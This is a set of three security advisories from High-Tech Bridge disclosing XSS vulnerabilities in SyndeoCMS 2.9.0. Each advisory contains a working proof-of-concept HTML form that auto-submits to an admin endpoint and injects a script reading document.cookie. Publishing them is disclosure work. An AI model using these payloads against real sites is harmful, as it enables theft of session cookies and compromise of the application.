===================================================== Vulnerability ID: HTB22491 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_syndeocms.html Product: SyndeoCMS Vendor: The SyndeoCMS team ( http://www.syndeocms.org/ ) Vulnerable Version: 2.9.0 and Probably Prior Versions Vendor Notification: 12 July 2010 Vulnerability Type: Stored XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the saveconfig script to properly sanitize user-supplied input in "header" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: <form action="http://host/starnet/index.php?option=modulemanager&module=3&modoption=saveconfig" method="post" name="main" > <input type="hidden" name="general[0]" value="1" /> <input type="hidden" name="general[1]" value="#99FFFF" /> <input type="hidden" name="general[2]" value="900" /> <input type="hidden" name="general[3]" value="1" /> <input type="hidden" name="general[4]" value="#000066" /> <input type="hidden" name="header[1]" value="header4.php" /> <input type="hidden" name="header[2]" value="290" /> <input type="hidden" name="header[3]" value='starnet/media/header-bg.jpg"><script>alert(document.cookie)</script>' /> <input type="hidden" name="header[4]" value="Century Schoolbook" /> <input type="hidden" name="header[5]" value="55" /> <input type="hidden" name="header[6]" value="#FFFFFF" /> <input type="hidden" name="header[7]" value="0" /> <input type="hidden" name="header[0]" value="1" /> <input type="hidden" name="section[1]" value="section1.php" /> <input type="hidden" name="section[2]" value="#FF0000" /> <input type="hidden" name="section[3]" value="#99CC99" /> <input type="hidden" name="section[4]" value="#0099CC" /> <input type="hidden" name="section[5]" value="Arial" /> <input type="hidden" name="section[6]" value="14" /> <input type="hidden" name="section[7]" value="#FFFFFF" /> <input type="hidden" name="section[8]" value="100" /> <input type="hidden" name="section[9]" value="#0099CC" /> <input type="hidden" name="section[0]" value="1" /> <input type="hidden" name="status[1]" value="status3.php" /> <input type="hidden" name="status[2]" value="#FF33FF" /> <input type="hidden" name="status[3]" value="Arial" /> <input type="hidden" name="status[4]" value="10" /> <input type="hidden" name="status[5]" value="#CCFFCC" /> <input type="hidden" name="status[6]" value="Location:" /> <input type="hidden" name="status[7]" value="" /> <input type="hidden" name="status[8]" value="" /> <input type="hidden" name="status[9]" value="" /> <input type="hidden" name="status[0]" value="1" /> <input type="hidden" name="menu[1]" value="menu1.php" /> <input type="hidden" name="menu[2]" value="#CC66FF" /> <input type="hidden" name="menu[3]" value="#FF9966" /> <input type="hidden" name="menu[4]" value="#FF66FF" /> <input type="hidden" name="menu[5]" value="#CCCC99" /> <input type="hidden" name="menu[6]" value="Arial" /> <input type="hidden" name="menu[7]" value="14" /> <input type="hidden" name="menu[8]" value="#000000" /> <input type="hidden" name="menu[9]" value="starnet/themes/editable/arrow_blue.gif" /> <input type="hidden" name="menu[0]" value="1" /> <input type="hidden" name="content[0]" value="content1.php" /> <input type="hidden" name="content[1]" value="#FFFFFF" /> <input type="hidden" name="content[2]" value="#FFFF99" /> <input type="hidden" name="content[3]" value="630" /> <input type="hidden" name="content[4]" value="500" /> <input type="hidden" name="content[5]" value="Arial" /> <input type="hidden" name="content[6]" value="10" /> <input type="hidden" name="content[7]" value="#000000" /> <input type="hidden" name="content[8]" value="1" /> <input type="hidden" name="footer[1]" value="footer2.php" /> <input type="hidden" name="footer[2]" value="#003366" /> <input type="hidden" name="footer[3]" value="Arial" /> <input type="hidden" name="footer[4]" value="10" /> <input type="hidden" name="footer[5]" value="#FFFFFF" /> <input type="hidden" name="footer[6]" value="Page last changed:" /> <input type="hidden" name="footer[7]" value="25" /> <input type="hidden" name="footer[0]" value="1" /> <input type="hidden" name="savebutton" value=" Save" /> </form> <script> document.main.submit(); </script> ===================================================== Vulnerability ID: HTB22492 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_syndeocms_1.html Product: SyndeoCMS Vendor: The SyndeoCMS team ( http://www.syndeocms.org/ ) Vulnerable Version: 2.9.0 and Probably Prior Versions Vendor Notification: 12 July 2010 Vulnerability Type: Stored XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the save_link script to properly sanitize user-supplied input in "link_description" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: <form action="http://host/starnet/index.php?option=modulemanager&module=2&modoption=save_link&suboption=&page_id=3&link_id=2" method="post" name="main" > <input type="hidden" name="link_category" value="ICT"> <input type="hidden" name="link_title" value="Google"> <input type="hidden" name="link_url" value="http://www.google.com"> <input type="hidden" name="link_description" value='Search Engine."><script>alert(document.cookie)</script>'> <input type="hidden" name="link_sort" value="1"> <input type="hidden" name="page_id" value="3"> <input type="hidden" name="initial" value="1"> <input type="hidden" name="savebutton" value=" Save" > ===================================================== Vulnerability ID: HTB22493 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_syndeocms_2.html Product: SyndeoCMS Vendor: The SyndeoCMS team ( http://www.syndeocms.org/ ) Vulnerable Version: 2.9.0 and Probably Prior Versions Vendor Notification: 12 July 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the save_message script to properly sanitize user-supplied input in "message" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: <form action="http://host/starnet/index.php?option=modulemanager&module=13&modoption=save_message&suboption=&message_id=1&cat_id=4" method="post" name="main" > <input type="hidden" name="intro_message" value="Holiday"> <input type="hidden" name="days" value="0"> <input type="hidden" name="page_id" value="4"> <input type="hidden" name="name" value="Director"> <input type="hidden" name="date" value="09-07-2010"> <input type="hidden" name="message" value='Next week is a holiday so all the children are free"><script>alert(document.cookie)</script>' > <input type="hidden" name="savebutton" value=" Save"> </form> <script> document.main.submit(); </script>